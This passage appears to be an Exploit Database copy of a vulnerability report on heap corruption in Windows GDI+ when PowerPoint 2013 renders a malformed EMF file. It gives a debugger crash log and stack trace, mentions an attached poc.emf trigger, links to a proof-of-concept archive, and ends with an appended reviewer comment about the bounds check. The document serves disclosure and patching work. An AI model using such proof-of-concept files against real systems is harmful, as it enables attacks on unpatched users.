||||
--- cut ---
|
||||
|
||||
An example crash log from PowerPoint 2013, indicating heap corruption, is shown below (the condition can also be reproduced reliably by enabling Page Heap on the GDI+ client process):
|
||||
|
||||
--- cut ---
|
||||
(2a8c.2bd8): Break instruction exception - code 80000003 (first chance)
|
||||
eax=00000000 ebx=00000000 ecx=772336ab edx=0022cb85 esi=03bd0000 edi=1171ffc0
|
||||
eip=7728e815 esp=0022cdd8 ebp=0022ce50 iopl=0 nv up ei pl nz na pe nc
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
|
||||
ntdll!RtlReportCriticalFailure+0x29:
|
||||
7728e815 cc int 3
|
||||
0:000> kb
|
||||
ChildEBP RetAddr Args to Child
|
||||
0022ce50 7728f749 c0000374 772c4270 0022ce94 ntdll!RtlReportCriticalFailure+0x29
|
||||
0022ce60 7728f829 00000002 64dc1326 03bd0000 ntdll!RtlpReportHeapFailure+0x21
|
||||
0022ce94 7724ab46 0000000c 03bd0000 1171ffc0 ntdll!RtlpLogHeapFailure+0xa1
|
||||
0022cf84 771f3431 00000258 00000260 03bd00c4 ntdll!RtlpAllocateHeap+0x7b2
|
||||
0022d008 695071ec 03bd0000 00000000 00000258 ntdll!RtlAllocateHeap+0x23a
|
||||
0022d01c 6951bbf1 00000258 116b5104 03bdd558 gdiplus!GpMalloc+0x16
|
||||
0022d030 69557185 116b50e0 116b50e0 03bdd558 gdiplus!GpGraphics::Save+0x11
|
||||
0022d4b0 69557bdc 116b50e0 116b5104 116b30d8 gdiplus!CEmfPlusEnumState::PlayExtTextOut+0xda
|
||||
0022d4ec 69557f25 00000053 03bdae00 00006044 gdiplus!CEmfPlusEnumState::ExtTextOutA+0x136
|
||||
0022d500 695286ca 00000053 00006044 0d67b568 gdiplus!CEmfPlusEnumState::ProcessRecord+0x13b
|
||||
0022d51c 69528862 00000053 00000000 00006044 gdiplus!GdipPlayMetafileRecordCallback+0x6c
|
||||
0022d544 768155f4 9d211b17 0d567180 0d67b568 gdiplus!EnumEmfDownLevel+0x6e
|
||||
0022d5d0 6952aa36 9d211b17 403581b3 695287f4 GDI32!bInternalPlayEMF+0x6a3
|
||||
0022d608 6952d199 9d211b17 05462305 0122d674 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
|
||||
0022d6b0 6952f455 00000000 05462305 0022d7d8 gdiplus!GpGraphics::EnumEmf+0x391
|
||||
0022d810 69534742 00000000 42901225 42901d0b gdiplus!GpMetafile::EnumerateForPlayback+0x7b9
|
||||
0022d90c 695347c6 03bd2fd8 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
|
||||
0022d970 6952c792 03bd2fd8 0022d9e4 0022d9e4 gdiplus!GpGraphics::DrawImage+0x51
|
||||
0022d9a8 6952ea7a 03bd2fd8 0022d9e4 00000004 gdiplus!GpGraphics::DrawMetafileSplit+0x1f
|
||||
0022d9fc 6952f4d5 03bdc438 0022dadc 00000000 gdiplus!GpMetafile::ConvertToEmfPlus+0x1c1
|
||||
0022da20 69504f71 03bdc438 0022dadc 00000004 gdiplus!GpMetafile::ConvertToEmfPlus+0x1d
|
||||
0022da5c 54793044 03bdc438 03bd2fd8 0022dadc gdiplus!GdipConvertToEmfPlus+0xbf
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
0022daf0 548c7b8d 00000000 03bdc438 b93aea31 oart!Ordinal3385+0x7e8
|
||||
0022df18 548c749b 0022e3a4 094c4380 0022e18c oart!Ordinal655+0x874
|
||||
0022e12c 54793cbb 0022e3a4 094c4380 0022e18c oart!Ordinal655+0x182
|
||||
0022e1c0 546bf722 0022e3a4 094c4380 00000000 oart!Ordinal5891+0xad1
|
||||
0022e200 5474987d 0022e3a4 0d4f7f34 0022e2ec oart!Ordinal3910+0xfd6
|
||||
0022e214 546bf6b4 0022e3a4 b93ad771 0d4f7f34 oart!Ordinal10880+0x98
|
||||
0022e258 546beea2 1c0e82b0 b93ad1a5 0d2bce4c oart!Ordinal3910+0xf68
|
||||
0022e48c 546be7e4 0022e968 0022ed6c 00000002 oart!Ordinal3910+0x756
|
||||
0022e550 546be4d3 0d2bce48 0022e964 09661440 oart!Ordinal3910+0x98
|
||||
0022e574 546be440 0022e968 00000002 0022e9b8 oart!Ordinal8924+0xaf
|
||||
0022e598 546be3aa 0022e968 00000002 0022e9b8 oart!Ordinal8924+0x1c
|
||||
0022e728 546bc00d 0d83a888 00000000 00000000 oart!Ordinal5363+0x261
|
||||
0022e784 5474c3c6 00000000 00000000 0d43e458 oart!Ordinal8822+0x20
|
||||
0022e894 5474c224 0022e964 0022eaa0 00000000 oart!Ordinal5408+0x4f1
|
||||
0022ea64 5474bff6 0d371f40 0022eaa0 00000000 oart!Ordinal5408+0x34f
|
||||
0022eb28 54749818 0d371f40 0022ebac 0022eb4c oart!Ordinal5408+0x121
|
||||
0022eb5c 5473ea78 0d371f40 0022ebac 00000000 oart!Ordinal10880+0x33
|
||||
0022ed0c 54741fc8 0d371f40 0022ef28 00000000 oart!Ordinal1852+0x241
|
||||
0022ed44 547425e5 0d371f40 0022ef28 00000000 oart!Ordinal2425+0x5ea
|
||||
0022ef6c 54743796 0d1a15a0 00000000 0022f34c oart!Ordinal2425+0xc07
|
||||
0022f0e4 54741d5c 0022f1f0 0473c1ab 3feab68a oart!Ordinal2081+0x292
|
||||
0022f210 547439d6 0022f2d0 0473c1ab 3feab68a oart!Ordinal2425+0x37e
|
||||
0022f268 554ecfaa 0022f2d0 0473c1ab 3feab68a oart!Ordinal8518+0xb6
|
||||
0022f380 554edbd7 b93ac69d 0d3d99bc 0d3d9998 ppcore!PPMain+0x74eff
|
||||
0022f3b4 554edba9 55497d99 0022f3df b93ac6d9 ppcore!PPMain+0x75b2c
|
||||
0022f3f0 55497d5a 0022f428 0fabe376 0d3d99b8 ppcore!PPMain+0x75afe
|
||||
0022f3f8 0fabe376 0d3d99b8 0d184d04 0fabe203 ppcore!PPMain+0x1fcaf
|
||||
0022f428 0fabd28d 003f9a38 003f7e00 003ff518 mso!Ordinal8295+0x22d
|
||||
0022f440 0fbd483a 003f9a38 01a81a32 003ff608 mso!Ordinal4996+0x12b
|
||||
0022f478 0fbd476e 00000001 003ff608 003f7d5c mso!Ordinal3599+0xaf
|
||||
0022f4d0 0fbce774 003f7d5c 00000000 003f7e9c mso!Ordinal9018+0x334
|
||||
0022f4ec 0fbcc03c 00000000 0022f55c 00000100 mso!Ordinal8480+0x29d
|
||||
0022f500 0fbcbf08 003f7e9c 0022f528 5549d3f5 mso!Ordinal4921+0x4c1
|
||||
0022f50c 5549d3f5 03cd02a0 ffffffff 5549d38b mso!Ordinal4921+0x38d
|
||||
0022f528 5549d26c 0022f55c 00000001 00000000 ppcore!PPMain+0x2534a
|
||||
0022f540 5549d238 0022f55c b93ac2b5 01033034 ppcore!PPMain+0x251c1
|
||||
0022f79c 554780fc 0022f7b8 b93acd25 01033034 ppcore!PPMain+0x2518d
|
||||
0022f80c 01031572 00312c8c 0022f8ac 0103154a ppcore!PPMain+0x51
|
||||
0022f818 0103154a 01030000 00000000 00312c8c POWERPNT+0x1572
|
||||
0022f8ac 76a5338a fffde000 0022f8f8 771f9902 POWERPNT+0x154a
|
||||
0022f8b8 771f9902 fffde000 64dc254a 00000000 kernel32!BaseThreadInitThunk+0xe
|
||||
0022f8f8 771f98d5 010312bb fffde000 ffffffff ntdll!__RtlUserThreadStart+0x70
|
||||
0022f910 00000000 010312bb fffde000 00000000 ntdll!_RtlUserThreadStart+0x1b
|
||||
--- cut ---
|
||||
|
||||
The poc.emf file is attached.
|
||||
|
||||
The above analysis was performed using the gdiplus.dll file found in C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll on a fully patched Windows 7 64-bit operating system (md5sum c861ee277cd4e2d914740000161956ef).
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40257.zip
|
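Review bot: The quoted validation, "record_size - 4 >= record->emrtext.offDx", is described as too weak, but 40257.txt stops short of giving the bound that matches the spec text it quotes. Given the statement that the spacing array takes 4 * N bytes for "Chars" characters, add the corrected condition: offDx plus 4 * nChars must not exceed record_size, evaluated so that neither the multiplication nor the addition can wrap. The stack trace is also much longer than in the two sibling files: everything below "WARNING: Stack unwind information not available. Following frames may be wrong." consists of oart, ppcore and mso ordinal frames that the analysis does not use, so trimming it after gdiplus!GdipConvertToEmfPlus with "..." as the other files do would keep the entry readable.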